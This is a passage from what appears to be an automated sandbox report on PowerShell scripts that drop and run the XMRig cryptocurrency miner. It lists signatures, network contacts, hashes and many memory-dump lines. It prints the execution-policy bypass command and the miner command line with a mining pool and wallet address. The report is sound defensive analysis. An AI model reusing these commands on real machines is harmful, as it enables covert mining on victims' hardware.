N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 48.192.11.51.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

memory/4948-5-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp

memory/4948-4-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp

memory/4948-6-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp

memory/4948-7-0x000001DF1CE70000-0x000001DF1CE92000-memory.dmp

memory/4948-10-0x000001DF1D020000-0x000001DF1D096000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lu5nku1r.ujj.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4948-25-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp

memory/4948-48-0x000001DF1D0A0000-0x000001DF1D0B2000-memory.dmp

memory/4948-61-0x000001DF1D010000-0x000001DF1D01A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3264-90-0x000001BDC35F0000-0x000001BDC3610000-memory.dmp

memory/3264-91-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/4948-92-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp

memory/3264-93-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/4948-94-0x00007FFF14E60000-0x00007FFF1503B000-memory.dmp

memory/3264-95-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-96-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-97-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-98-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-99-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-100-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-101-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-102-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-103-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-104-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-105-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-106-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-107-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-108-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-109-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-110-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-111-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-112-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-113-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-114-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-115-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-116-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-117-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-118-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-119-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-120-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-121-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-122-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-123-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-124-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-125-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-126-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-127-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-128-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-129-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-130-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-131-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-132-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-133-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-134-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-135-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-136-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-137-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-138-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-139-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-140-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-141-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-142-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-143-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-144-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-145-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-146-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-147-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-148-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-149-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-150-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-151-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-152-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-153-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-154-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

memory/3264-155-0x00007FF7CF350000-0x00007FF7CFF83000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:36

Platform

win10v2004-20240508-en

Max time kernel

1684s

Max time network

1693s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

memory/3452-0-0x00007FFED0E03000-0x00007FFED0E05000-memory.dmp

memory/3452-1-0x000001F871280000-0x000001F8712A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cmelzcau.ids.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3452-11-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp

memory/3452-12-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp

memory/3452-13-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp

memory/3452-14-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp

memory/3452-15-0x00007FFED0E03000-0x00007FFED0E05000-memory.dmp

memory/3452-16-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp

memory/3452-17-0x00007FFED0E00000-0x00007FFED18C1000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:44

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/4988-3-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/4988-5-0x000001E9181F0000-0x000001E918212000-memory.dmp

memory/4988-8-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-9-0x000001E9183A0000-0x000001E918416000-memory.dmp

memory/4988-10-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ovvykolq.ems.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4988-25-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-61-0x000001E918380000-0x000001E91838A000-memory.dmp

memory/4988-48-0x000001E918520000-0x000001E918532000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/796-90-0x000001DFE6B20000-0x000001DFE6B40000-memory.dmp

memory/796-91-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-92-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/4988-93-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-94-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/4988-95-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4988-96-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/796-97-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-98-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-99-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-100-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-101-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-102-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-103-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-104-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-105-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-106-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-107-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-108-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-109-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-110-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-111-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-112-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-113-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-114-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-115-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-116-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-117-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-118-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-119-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-120-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-121-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-122-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-123-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-124-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-125-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-126-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-127-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-128-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-129-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-130-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-131-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-132-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-133-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-134-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-135-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-136-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-137-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-138-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-139-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-140-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-141-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-142-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-143-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-144-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-145-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-146-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-147-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-148-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-149-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-150-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-151-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-152-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-153-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-154-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-155-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-156-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

memory/796-157-0x00007FF7F0F50000-0x00007FF7F1B83000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:48

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/588-3-0x00007FFE32143000-0x00007FFE32144000-memory.dmp

memory/588-5-0x00000223D74A0000-0x00000223D74C2000-memory.dmp

memory/588-6-0x00007FFE32140000-0x00007FFE32B2C000-memory.dmp

memory/588-9-0x00007FFE32140000-0x00007FFE32B2C000-memory.dmp

memory/588-10-0x00000223D75D0000-0x00000223D7646000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2conkjh.d2u.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/588-25-0x00007FFE32140000-0x00007FFE32B2C000-memory.dmp

memory/588-48-0x00000223D73B0000-0x00000223D73C2000-memory.dmp

memory/588-61-0x00000223D73A0000-0x00000223D73AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/372-90-0x0000016C598C0000-0x0000016C598E0000-memory.dmp

memory/372-91-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/588-92-0x00007FFE32140000-0x00007FFE32B2C000-memory.dmp

memory/588-94-0x00007FFE32143000-0x00007FFE32144000-memory.dmp

memory/372-93-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/588-95-0x00007FFE32140000-0x00007FFE32B2C000-memory.dmp

memory/372-96-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-97-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-98-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-99-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-100-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-101-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-102-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

memory/372-103-0x00007FF74CB30000-0x00007FF74D763000-memory.dmp

